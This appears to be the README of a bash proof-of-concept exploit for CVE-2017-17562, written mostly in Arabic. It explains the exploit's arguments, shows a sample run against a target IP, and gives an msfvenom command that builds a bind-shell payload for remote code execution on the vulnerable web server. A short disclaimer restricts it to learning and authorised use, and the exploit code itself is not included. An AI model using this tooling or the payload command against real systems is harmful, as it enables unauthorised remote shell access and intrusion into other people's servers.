
PoC لـ CVE-2017-17562 مكتوب بلغة bash
تنفيذ PoC بلغة Bash لـ CVE-2017-17562.
يتطلب curl لصياغة طلبات HTTP.
مبني على تنفيذات Metasploit و @fssecur3.
الوسائط التالية يجب تعيينها لأنها مطلوبة لمرحلة الاستطلاع + إرسال الحمولة:
$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine
اختياريًا، يمكن أيضًا تعيين الوسائط التالية:
$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints
الكود الحالي مخصص فقط لأغراض التعلم والتوضيح. لا يجوز استخدامه ضد أهداف ليس لديك إذن بذلك.
لا يتم توفير أي حمولات في هذا المستودع. ومع ذلك، فإن أي ملف ثنائي يتوافق مع بنية نظام التشغيل الهدف يجب أن يعمل. لصياغة حمولة bind shell، يمكنك استخدام msfvenon:
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so